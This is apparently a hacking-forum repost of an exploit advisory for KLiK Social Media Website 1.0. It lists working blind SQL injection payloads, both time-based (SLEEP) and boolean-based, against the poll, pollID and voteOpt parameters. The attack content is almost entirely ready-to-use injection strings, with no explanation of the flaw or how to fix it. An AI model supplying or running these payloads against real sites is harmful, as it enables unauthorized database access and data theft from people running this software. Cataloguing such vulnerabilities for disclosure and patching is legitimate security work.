KLiK Social Media Website 1.0 - 'Multiple' SQLi

HACK1949 · November 4, 2022

# Exploit Title: KLiK Social Media Website 1.0 - 'Multiple' SQLi
# Date: April 1st, 2022
# Exploit Author: corpse
# Vendor Homepage: https://github.com/msaad1999/KLiK-SocialMediaWebsite
# Software Link: https://github.com/msaad1999/KLiK-SocialMediaWebsite
# Version: 1.0
# Tested on: Debian 11

Parameter: poll (GET)
    Type: time-based blind
    Title: MySQL time-based blind - Parameter replace (ELT)
    Payload: poll=ELT(1079=1079,SLEEP(5))

Parameter: pollID (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: voteOpt=26&voteSubmit=Submit Vote&pollID=15 AND 1248=1248

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: voteOpt=26&voteSubmit=Submit Vote&pollID=15 AND (SELECT 7786 FROM (SELECT(SLEEP(5)))FihS)

Parameter: voteOpt (POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: voteOpt=(SELECT (CASE WHEN (7757=7757) THEN 26 ELSE (SELECT 1548 UNION SELECT 8077) END))&voteSubmit=Submit Vote&pollID=15

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: voteOpt=26 AND (SELECT 8024 FROM (SELECT(SLEEP(5)))DZnp)&voteSubmit=Submit Vote&pollID=15

Sign In

Hello visitors, welcome to the Hacker World Forum!

KLiK Social Media Website 1.0 - 'Multiple' SQLi

Recommended Posts

HACK1949

Link to post

Link to comment

Share on other sites

discussion group

discussion group

Recently Browsing 0 members

黑客世界站内导航 (SITE MAP)